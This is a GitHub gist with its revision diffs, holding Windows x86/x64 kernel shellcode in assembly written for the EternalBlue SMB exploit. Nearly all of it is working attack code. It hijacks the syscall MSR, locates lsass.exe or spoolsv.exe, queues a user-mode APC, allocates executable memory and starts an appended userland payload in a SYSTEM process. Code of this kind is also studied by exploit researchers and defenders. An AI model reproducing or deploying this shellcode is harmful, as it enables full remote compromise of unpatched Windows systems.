    mov [esp+0x10], eax ; move saved eip to &SystemArgument2
    pop eax ; PKAPC (unused)
    pop ecx ; &NormalRoutine
    pop eax ; &NormalContext
    pop edx ; &SystemArgument1
    pushad
    push edx ; &SystemArgument1 (use for set CreateThread address)
    push ecx ; &NormalRoutine
    mov ebp, [eax] ; *NormalContext is our data area pointer

    ;======================================
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    ;======================================
    xor eax, eax
    mov byte [fs:0x24], al ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
    cdq
    mov al, 0x40 ; eax = 0x40
    push eax ; PAGE_EXECUTE_READWRITE = 0x40
    shl eax, 6 ; eax = 0x40 << 6 = 0x1000
    push eax ; MEM_COMMIT = 0x1000
    push esp ; &RegionSize = 0x1000 (reuse MEM_COMMIT argument in stack)
    push edx ; ZeroBits
    mov [ecx], edx
    push ecx ; baseAddr = 0
    dec edx
    push edx ; ProcessHandle = -1
    mov eax, ZWALLOCATEVIRTUALMEMORY_HASH
    call win_api_direct
    %ifndef COMPACT
    test eax, eax
    jnz _kernel_kapc_routine_exit
    %endif
    ;======================================
    ; copy userland payload
    ;======================================
    pop eax
    mov edi, [eax]
    call _kernel_kapc_routine_find_userland
    _kernel_kapc_routine_find_userland:
    pop esi
    add esi, userland_start-_kernel_kapc_routine_find_userland
    mov ecx, 0x400 ; fix payload size to 1024 bytes
    rep movsb
    ;======================================
    ; find current PEB
    ;======================================
    mov eax, [ebp+DATA_EPROCESS_OFFSET]
    push eax
    mov eax, PSGETPROCESSPEB_HASH
    call win_api_direct
    ;======================================
    ; find CreateThread address (in kernel32.dll)
    ;======================================
    mov eax, [eax + 0xc] ; PEB->Ldr
    mov eax, [eax + 0x14] ; InMemoryOrderModuleList

    %ifdef COMPACT
    mov esi, [eax] ; first one always be executable, skip it
    lodsd ; skip ntdll.dll
    %else
    _find_kernel32_dll_loop:
    mov eax, [eax] ; first one always be executable
    ; offset 0x1c (WORD) => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x24 (WORD) => must be 0x18 (name len kernel32.dll)
    ; offset 0x28 => is name
    ; offset 0x10 => is dllbase
    ;cmp word [eax+0x1c], 0x40
    ;jne _find_kernel32_dll_loop
    cmp word [eax+0x24], 0x18
    jne _find_kernel32_dll_loop
    mov edx, [eax+0x28]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [edx+0xc], 0x00320033 ; 3\x002\x00
    jnz _find_kernel32_dll_loop
    %endif
    mov ebx, [eax+0x10]
    mov [ebp+DATA_MODULE_ADDR_OFFSET], ebx
    mov eax, CREATETHREAD_HASH
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    pop ecx
    mov [ecx], eax
    _kernel_kapc_routine_exit:
    xor eax, eax
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [ebp+DATA_QUEUEING_KAPC_OFFSET], al
    ; restore IRQL to APC_LEVEL
    inc eax
    mov byte [fs:0x24], al
    popad
    ret

    userland_start:
    userland_start_thread:
    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    pop edx ; saved eip
    pop eax ; first argument (NormalContext)
    pop eax ; CreateThread address passed from kernel
    pop ecx ; another argument (NULL) passed from kernel
    push ecx ; lpThreadId = NULL
    push ecx ; dwCreationFlags = 0
    push ecx ; lpParameter = NULL
    call _userland_start_thread_find_payload
    _userland_start_thread_find_payload:
    add dword [esp], userland_payload-_userland_start_thread_find_payload ; lpStartAddr
    push ecx ; dwStackSize = 0
    push ecx ; lpThreadAttributes = NULL
    push edx ; restore saved eip
    jmp eax
    userland_payload:
  4. @worawit worawit revised this gist May 31, 2017. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion eternalblue_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -5,7 +5,7 @@
    ; - https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e
    ;
    ;
    ; Idea for Ring 3 to Ring 0 from Sean Dillon (@zerosum0x0)
    ; Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
    ;
    ;
    ; Note:
  5. @worawit worawit revised this gist May 30, 2017. 1 changed file with 4 additions and 4 deletions.
    8 changes: 4 additions & 4 deletions eternalblue_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -532,8 +532,6 @@ kernel_kapc_routine:
    ; find CreateThread address (in kernel32.dll)
    ;======================================
    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
    ; now the PEB address in memory is not needed anymore, allow other hijacked system call to run shellcode
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl ; ecx is 0 because of 'rep movsb'
    mov rdx, [rax + 0x18] ; PEB->Ldr
    mov rdx, [rdx + 0x20] ; InMemoryOrder list

    @@ -561,9 +559,11 @@ _find_kernel32_dll_loop:
    mov [r14], rax
    _kernel_kapc_routine_exit:
    xor ecx, ecx
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl
    ; restore IRQL to APC_LEVEL
    push 1
    pop rcx
    mov cl, 1
    mov cr8, rcx
    pop r15
  6. @worawit worawit revised this gist May 29, 2017. 1 changed file with 10 additions and 9 deletions.
    19 changes: 10 additions & 9 deletions eternalblue_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -12,9 +12,9 @@
    ; - The userland shellcode is run in a new thread of system process.
    ; If userland shellcode causes any exception, the system process get killed.
    ; - On idle target with multiple core processors, the hijacked system call might take a while (> 3 minutes) to
    ; get call because system call is called on other processors
    ; - The shellcode do not allocate shadow stack if possible for minimize size
    ; because some Windows function does not require shadow stack.
    ; get call because system call is called on other processors.
    ; - The shellcode do not allocate shadow stack if possible for minimal shellcode size.
    ; It is ok because some Windows function does not require shadow stack.
    ; - The userland payload MUST be appened to this shellcode.
    ;
    ; Reference:
    @@ -78,7 +78,7 @@ setup_syscall_hook:
    cmp eax, r9d
    je _setup_syscall_hook_done
    ; setting MSR 0xc0000082 is effect only running processor
    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
    cmp dword [r8+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    @@ -93,6 +93,7 @@ setup_syscall_hook:

    _hook_syscall:
    ; set a new syscall on running processor
    ; setting MSR 0xc0000082 affects only running processor
    mov rdx, r9
    mov eax, edx
    shr rdx, 32
    @@ -110,9 +111,9 @@ _setup_syscall_hook_done:
    ; Find memory address in HAL heap for using as data area
    ;========================================================================
    find_data_address_fn:
    ; on idle target without user application, syscall on hijacked processor might not be called immediately.
    ; find some address to store the data, this address MUST not be replaced
    ; when exploit is rerun before syscall is called
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ; when exploit is rerun before syscall is called
    lea rax, [rel _find_data_address_next + 0x1000]
    _find_data_address_next:
    shr rax, 12
    @@ -227,7 +228,7 @@ _x64_find_nt_walk_page:
    ;======================================
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
    cmp eax, 0x400 ; ebx is still an offset of EPROCESS.ImageFilename
    cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
    add eax, 0x10
    _find_eprocess_threadlist_offset_win7:
    @@ -515,7 +516,7 @@ kernel_kapc_routine:
    mov edi, ZWALLOCATEVIRTUALMEMORY_HASH
    call win_api_direct
    add rsp, 0x30
    ; check error
    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit
  7. @worawit worawit revised this gist May 29, 2017. 1 changed file with 2 additions and 2 deletions.
    4 changes: 2 additions & 2 deletions eternalblue_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -50,7 +50,7 @@ global shellcode_start
    shellcode_start:

    setup_syscall_hook:
    ; IRQL is DISPATCH_LEVEL when got code execute
    ; IRQL is DISPATCH_LEVEL when got code execution

    %ifdef WIN7
    mov rdx, [rsp+0x40] ; fetch SRVNET_BUFFER address from function argument
    @@ -110,7 +110,7 @@ _setup_syscall_hook_done:
    ; Find memory address in HAL heap for using as data area
    ;========================================================================
    find_data_address_fn:
    ; on idle target without user application, next syscall might need to wait >2 minutes
    ; on idle target without user application, syscall on hijacked processor might not be called immediately.
    ; find some address to store the data, this address MUST not be replaced
    ; when exploit is rerun before syscall is called
    lea rax, [rel _find_data_address_next + 0x1000]
  8. @worawit worawit revised this gist May 29, 2017. 1 changed file with 6 additions and 4 deletions.
    10 changes: 6 additions & 4 deletions eternalblue_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -11,6 +11,8 @@
    ; Note:
    ; - The userland shellcode is run in a new thread of system process.
    ; If userland shellcode causes any exception, the system process get killed.
    ; - On idle target with multiple core processors, the hijacked system call might take a while (> 3 minutes) to
    ; get call because system call is called on other processors
    ; - The shellcode do not allocate shadow stack if possible for minimize size
    ; because some Windows function does not require shadow stack.
    ; - The userland payload MUST be appened to this shellcode.
    @@ -52,15 +54,15 @@ setup_syscall_hook:

    %ifdef WIN7
    mov rdx, [rsp+0x40] ; fetch SRVNET_BUFFER address from function argument
    ; set nByteProcessed for trigger free after return
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x2c]
    mov [rdx+0x38], ecx
    %elifdef WIN8
    mov rdx, [rsp+0x40] ; fetch SRVNET_BUFFER address from function argument
    ; fix pool pointer (rcx is -0x8150 from controlled argument value)
    add rcx, rdx
    mov [rdx+0x30], rcx
    ; set nByteProcessed for trigger free after return
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x48]
    mov [rdx+0x40], ecx
    %endif
    @@ -144,7 +146,7 @@ syscall_hook:
    push r10
    push r11
    ; use lock cmpxchg for queueing APC only once
    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    cdq
    mov dl, 1
    @@ -179,7 +181,7 @@ r3_to_r0_start:
    ;======================================
    ; restore syscall
    ;======================================
    ; an error after restoring syscall should never happen
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
  9. @worawit worawit created this gist May 28, 2017.
    589 changes: 589 additions & 0 deletions eternalblue_kshellcode.asm
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,589 @@
    ;
    ; Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
    ; The shellcode is written for eternalblue exploit:
    ; - https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a
    ; - https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e
    ;
    ;
    ; Idea for Ring 3 to Ring 0 from Sean Dillon (@zerosum0x0)
    ;
    ;
    ; Note:
    ; - The userland shellcode is run in a new thread of system process.
    ; If userland shellcode causes any exception, the system process get killed.
    ; - The shellcode do not allocate shadow stack if possible for minimize size
    ; because some Windows function does not require shadow stack.
    ; - The userland payload MUST be appened to this shellcode.
    ;
    ; Reference:
    ; - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
    ; - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c

    BITS 64
    ORG 0


    PSGETCURRENTPROCESS_HASH EQU 0xdbf47c78
    PSGETPROCESSID_HASH EQU 0x170114e1
    PSGETPROCESSIMAGEFILENAME_HASH EQU 0x77645f3f
    LSASS_EXE_HASH EQU 0xc1fa6a5a
    SPOOLSV_EXE_HASH EQU 0x3ee083d8
    ZWALLOCATEVIRTUALMEMORY_HASH EQU 0x576e99ea
    KEINITIALIZEAPC_HASH EQU 0x6d195cc4
    KEINSERTQUEUEAPC_HASH EQU 0xafcc4634
    PSGETPROCESSPEB_HASH EQU 0xb818b848
    CREATETHREAD_HASH EQU 0x835e515e



    DATA_PEB_ADDR_OFFSET EQU -0x10
    DATA_QUEUEING_KAPC_OFFSET EQU -0x8
    DATA_ORIGIN_SYSCALL_OFFSET EQU 0x0
    DATA_NT_KERNEL_ADDR_OFFSET EQU 0x8
    DATA_KAPC_OFFSET EQU 0x10

    section .text
    global shellcode_start

    shellcode_start:

    setup_syscall_hook:
    ; IRQL is DISPATCH_LEVEL when got code execute

    %ifdef WIN7
    mov rdx, [rsp+0x40] ; fetch SRVNET_BUFFER address from function argument
    ; set nByteProcessed for trigger free after return
    mov ecx, [rdx+0x2c]
    mov [rdx+0x38], ecx
    %elifdef WIN8
    mov rdx, [rsp+0x40] ; fetch SRVNET_BUFFER address from function argument
    ; fix pool pointer (rcx is -0x8150 from controlled argument value)
    add rcx, rdx
    mov [rdx+0x30], rcx
    ; set nByteProcessed for trigger free after return
    mov ecx, [rdx+0x48]
    mov [rdx+0x40], ecx
    %endif
    call find_data_address_fn
    mov r8, rax
    ; read current syscall
    mov ecx, 0xc0000082
    rdmsr
    ; do NOT replace saved original syscall address with hook syscall
    lea r9, [rel syscall_hook]
    cmp eax, r9d
    je _setup_syscall_hook_done
    ; setting MSR 0xc0000082 is effect only running processor
    cmp dword [r8+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    ; save original syscall
    mov dword [r8+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
    mov dword [r8+DATA_ORIGIN_SYSCALL_OFFSET], eax
    ; first time on the target, clear the data area
    xor edx, edx
    mov qword [r8+DATA_NT_KERNEL_ADDR_OFFSET], rdx
    mov qword [r8+DATA_QUEUEING_KAPC_OFFSET], rdx

    _hook_syscall:
    ; set a new syscall on running processor
    mov rdx, r9
    mov eax, edx
    shr rdx, 32
    wrmsr
    _setup_syscall_hook_done:
    %ifdef WIN7
    xor eax, eax
    %elifdef WIN8
    xor eax, eax
    %endif
    ret

    ;========================================================================
    ; Find memory address in HAL heap for using as data area
    ;========================================================================
    find_data_address_fn:
    ; on idle target without user application, next syscall might need to wait >2 minutes
    ; find some address to store the data, this address MUST not be replaced
    ; when exploit is rerun before syscall is called
    lea rax, [rel _find_data_address_next + 0x1000]
    _find_data_address_next:
    shr rax, 12
    shl rax, 12
    sub rax, 0x70 ; for KAPC struct too
    ret


    syscall_hook:
    swapgs
    mov qword [gs:0x10], rsp
    mov rsp, qword [gs:0x1a8]
    push 0x2b
    push qword [gs:0x10]
    push rax ; want this stack space to store original syscall addr
    ; save rax first to make this function continue to real syscall
    push rax
    push rbp ; save rbp here because rbp is special register for accessing this shellcode data
    call find_data_address_fn
    mov rbp, rax
    mov rax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    add rax, 0x1f ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [rsp+0x10], rax

    ; save all volatile registers
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11
    ; use lock cmpxchg for queueing APC only once
    xor eax, eax
    cdq
    mov dl, 1
    lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
    jnz _syscall_hook_done

    ; allow interrupts while executing shellcode
    sti
    call r3_to_r0_start
    cli
    _syscall_hook_done:
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax
    ret

    r3_to_r0_start:
    ; save used non-volatile registers
    push r15
    push r14
    push r13
    push rdi
    push rsi
    push rbx

    ;======================================
    ; restore syscall
    ;======================================
    ; an error after restoring syscall should never happen
    mov ecx, 0xc0000082
    mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
    wrmsr
    ;======================================
    ; find nt kernel address
    ;======================================
    mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET] ; KiSystemCall64 is an address in nt kernel
    shr r15, 0xc ; strip to page size
    shl r15, 0xc

    _x64_find_nt_walk_page:
    sub r15, 0x1000 ; walk along page size
    cmp word [r15], 0x5a4d ; 'MZ' header
    jne _x64_find_nt_walk_page
    ; save nt address for using in KernelApcRoutine
    mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15

    ;======================================
    ; get current EPROCESS and ETHREAD
    ;======================================
    mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR
    mov edi, PSGETCURRENTPROCESS_HASH
    call win_api_direct
    xchg r13, rax ; r13 = EPROCESS
    ; r15 : nt kernel address
    ; r14 : ETHREAD
    ; r13 : EPROCESS
    ;======================================
    ; find offset of EPROCESS.ImageFilename
    ;======================================
    mov edi, PSGETPROCESSIMAGEFILENAME_HASH
    call get_offset_from_fn
    mov ecx, eax ; ecx = offset of EPROCESS.ImageFilename


    ;======================================
    ; find offset of EPROCESS.ThreadListHead
    ;======================================
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
    cmp eax, 0x400 ; ebx is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
    add eax, 0x10
    _find_eprocess_threadlist_offset_win7:
    lea rbx, [rax+0x28] ; ebx = offset of EPROCESS.ThreadListHead

    ;======================================
    ; find offset of ETHREAD.ThreadListEntry
    ;======================================
    lea r8, [r13+rbx] ; r8 = address of EPROCESS.ThreadListHead
    mov r9, r8
    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
    _find_ethread_threadlist_offset_loop:
    mov r9, qword [r9]
    cmp r8, r9 ; check end of list
    je _insert_queue_apc_done ; not found !!!
    ; if (r9 - r14 < 0x700) found
    mov rax, r9
    sub rax, r14
    cmp rax, 0x700
    ja _find_ethread_threadlist_offset_loop
    sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)


    ;======================================
    ; find offset of EPROCESS.ActiveProcessLinks
    ;======================================
    mov edi, PSGETPROCESSID_HASH
    call get_offset_from_fn
    lea rdx, [rax+8] ; edx = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)

    ;======================================
    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
    ;======================================
    ; check process name
    _find_target_process_loop:
    lea rsi, [r13+rcx]
    call calc_hash
    cmp eax, LSASS_EXE_HASH ; "lsass.exe"
    jz found_target_process
    cmp eax, SPOOLSV_EXE_HASH ; "spoolsv.exe"
    jz found_target_process
    ; next process
    mov r13, [r13+rdx]
    sub r13, rdx
    jmp _find_target_process_loop


    found_target_process:
    ; The allocation for userland payload will be in KernelApcRoutine.
    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

    ;======================================
    ; save process PEB for finding CreateThread address in kernel KAPC routine
    ;======================================
    mov edi, PSGETPROCESSPEB_HASH
    mov rcx, r13
    call win_api_direct
    mov [rbp+DATA_PEB_ADDR_OFFSET], rax
    ;======================================
    ; iterate ThreadList until KeInsertQueueApc() success
    ;======================================
    ; r15 = nt
    ; r14 = -(offset of ETHREAD.ThreadListEntry)
    ; r13 = EPROCESS
    ; ebx = offset of EPROCESS.ThreadListHead
    lea rsi, [r13 + rbx] ; rsi = ThreadListHead address
    mov rbx, rsi ; use rbx for iterating thread

    _insert_queue_apc_loop:
    ; TODO: do not try to queue APC if TEB.ActivationContextStackPointer is NULL
    ; if TEB.ActivationContextStackPointer is NULL, system will be reboot after inserting APC to queue
    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
    mov rbx, [rbx+8]
    cmp rsi, rbx
    je _insert_queue_apc_loop ; skip list head
    ; KeInitializeApc(PKAPC,
    ; PKTHREAD,
    ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
    ; PKKERNEL_ROUTINE = kernel_apc_routine,
    ; PKRUNDOWN_ROUTINE = NULL,
    ; PKNORMAL_ROUTINE = userland_shellcode,
    ; KPROCESSOR_MODE = UserMode (1),
    ; PVOID Context);
    lea rcx, [rbp+DATA_KAPC_OFFSET] ; PAKC
    xor r8, r8 ; OriginalApcEnvironment
    lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine
    push rbp ; context
    push 1 ; UserMode
    push rbp ; userland shellcode (MUST NOT be NULL)
    push r8 ; NULL
    lea rdx, [rbx + r14] ; ETHREAD
    sub rsp, 0x20 ; shadow stack
    mov edi, KEINITIALIZEAPC_HASH
    call win_api_direct
    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later

    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
    ; SystemArgument1 is second argument in usermode code (rdx)
    ; SystemArgument2 is third argument in usermode code (r8)
    lea rcx, [rbp+DATA_KAPC_OFFSET]
    ;xor edx, edx ; no need to set it here
    ;xor r8, r8 ; no need to set it here
    xor r9, r9
    mov edi, KEINSERTQUEUEAPC_HASH
    call win_api_direct
    add rsp, 0x40
    ; if insertion failed, try next thread
    test eax, eax
    jz _insert_queue_apc_loop
    mov rax, [rbp+DATA_KAPC_OFFSET+0x10] ; get KAPC.ApcListEntry
    ; EPROCESS pointer 8 bytes
    ; InProgressFlags 1 byte
    ; KernelApcPending 1 byte
    ; if success, UserApcPending MUST be 1
    cmp byte [rax+0x1a], 1
    je _insert_queue_apc_done
    ; manual remove list without lock
    mov [rax], rax
    mov [rax+8], rax
    jmp _insert_queue_apc_loop

    _insert_queue_apc_done:
    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

    _r3_to_r0_done:
    pop rbx
    pop rsi
    pop rdi
    pop r13
    pop r14
    pop r15
    ret

    ;========================================================================
    ; Call function in specific module
    ;
    ; All function arguments are passed as calling normal function with extra register arguments
    ; Extra Arguments: r15 = module pointer
    ; edi = hash of target function name
    ;========================================================================
    win_api_direct:
    call get_proc_addr
    jmp rax


    ;========================================================================
    ; Get function address in specific module
    ;
    ; Arguments: r15 = module pointer
    ; edi = hash of target function name
    ; Return: eax = offset
    ;========================================================================
    get_proc_addr:
    ; Save registers
    push rbx
    push rcx
    push rsi ; for using calc_hash

    ; use rax to find EAT
    mov eax, dword [r15+60] ; Get PE header e_lfanew
    add rax, r15
    mov eax, dword [rax+136] ; Get export tables RVA

    add rax, r15
    push rax ; save EAT

    mov ecx, dword [rax+24] ; NumberOfFunctions
    mov ebx, dword [rax+32] ; FunctionNames
    add rbx, r15

    _get_proc_addr_get_next_func:
    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec ecx ; decrement NumberOfFunctions
    mov esi, dword [rbx+rcx*4] ; Get rva of next module name
    add rsi, r15 ; Add the modules base address

    call calc_hash

    cmp eax, edi ; Compare the hashes
    jnz _get_proc_addr_get_next_func ; try the next function

    _get_proc_addr_finish:
    pop rax ; restore EAT
    mov ebx, dword [rax+36]
    add rbx, r15 ; ordinate table virtual address
    mov cx, word [rbx+rcx*2] ; desired functions ordinal
    mov ebx, dword [rax+28] ; Get the function addresses table rva
    add rbx, r15 ; Add the modules base address
    mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA
    add rax, r15 ; Add the modules base address to get the functions actual VA

    pop rsi
    pop rcx
    pop rbx
    ret

    ;========================================================================
    ; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
    ;
    ; Argument: rsi = string to hash
    ; Clobber: rsi
    ; Return: eax = hash
    ;========================================================================
    calc_hash:
    push rdx
    xor eax, eax
    cdq
    _calc_hash_loop:
    lodsb ; Read in the next byte of the ASCII string
    ror edx, 13 ; Rotate right our hash value
    add edx, eax ; Add the next byte of the string
    test eax, eax ; Stop when found NULL
    jne _calc_hash_loop
    xchg edx, eax
    pop rdx
    ret

    ;========================================================================
    ; Get offset of structure member from Windows function that simply return value of struct member.
    ;
    ; Arguments: r15 = module pointer
    ; edi = hash of target function name
    ; Return: eax = offset
    ;========================================================================
    get_offset_from_fn:
    call get_proc_addr
    cmp byte [rax+2], 0x80
    ja _get_offset_dword
    movzx eax, byte [rax+3]
    ret
    _get_offset_dword:
    mov eax, dword [rax+3]
    ret


    ; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
    ; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
    ; Moreover, there is no lock when calling KernelApcRoutine.
    ; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
    ;
    ; VOID KernelApcRoutine(
    ; IN PKAPC Apc,
    ; IN PKNORMAL_ROUTINE *NormalRoutine,
    ; IN PVOID *NormalContext,
    ; IN PVOID *SystemArgument1,
    ; IN PVOID *SystemArgument2)
    kernel_kapc_routine:
    push rbp
    push rdi
    push rsi
    push r14
    push r15
    mov rbp, [r8] ; *NormalContext is our data area pointer
    mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
    mov rsi, rdx
    mov r14, r9
    ;======================================
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    ;======================================
    xor eax, eax
    mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
    ; rdx is already address of baseAddr
    mov [rdx], rax ; baseAddr = 0
    mov ecx, eax
    not rcx ; ProcessHandle = -1
    mov r8, rax ; ZeroBits
    mov al, 0x40 ; eax = 0x40
    push rax ; PAGE_EXECUTE_READWRITE = 0x40
    shl eax, 6 ; eax = 0x40 << 6 = 0x1000
    push rax ; MEM_COMMIT = 0x1000
    ; reuse r9 for address of RegionSize
    mov [r9], rax ; RegionSize = 0x1000
    sub rsp, 0x20 ; shadow stack
    mov edi, ZWALLOCATEVIRTUALMEMORY_HASH
    call win_api_direct
    add rsp, 0x30
    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit
    ;======================================
    ; copy userland payload
    ;======================================
    mov rdi, [rsi]
    lea rsi, [rel userland_start]
    mov ecx, 0x800 ; fix payload size to 2048 bytes
    rep movsb
    ;======================================
    ; find CreateThread address (in kernel32.dll)
    ;======================================
    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
    ; now the PEB address in memory is not needed anymore, allow other hijacked system call to run shellcode
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl ; ecx is 0 because of 'rep movsb'
    mov rdx, [rax + 0x18] ; PEB->Ldr
    mov rdx, [rdx + 0x20] ; InMemoryOrder list

    _find_kernel32_dll_loop:
    mov rdx, [rdx] ; first one always be executable
    ; offset 0x38 (WORD) => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)
    ; offset 0x50 => is name
    ; offset 0x20 => is dllbase
    ;cmp word [rdx+0x38], 0x40
    ;jne _find_kernel32_dll_loop
    cmp word [rdx+0x48], 0x18
    jne _find_kernel32_dll_loop
    mov rax, [rdx+0x50]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [rax+0xc], 0x00320033 ; 3\x002\x00
    jnz _find_kernel32_dll_loop
    mov r15, [rdx+0x20]
    mov edi, CREATETHREAD_HASH
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    mov [r14], rax
    _kernel_kapc_routine_exit:
    ; restore IRQL to APC_LEVEL
    push 1
    pop rcx
    mov cr8, rcx
    pop r15
    pop r14
    pop rsi
    pop rdi
    pop rbp
    ret

    userland_start:
    userland_start_thread:
    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    xchg rdx, rax ; rdx is CreateThread address passed from kernel
    xor ecx, ecx ; lpThreadAttributes = NULL
    push rcx ; lpThreadId = NULL
    push rcx ; dwCreationFlags = 0
    mov r9, rcx ; lpParameter = NULL
    lea r8, [rel userland_payload] ; lpStartAddr
    mov edx, ecx ; dwStackSize = 0
    sub rsp, 0x20
    call rax
    add rsp, 0x30
    ret
    userland_payload: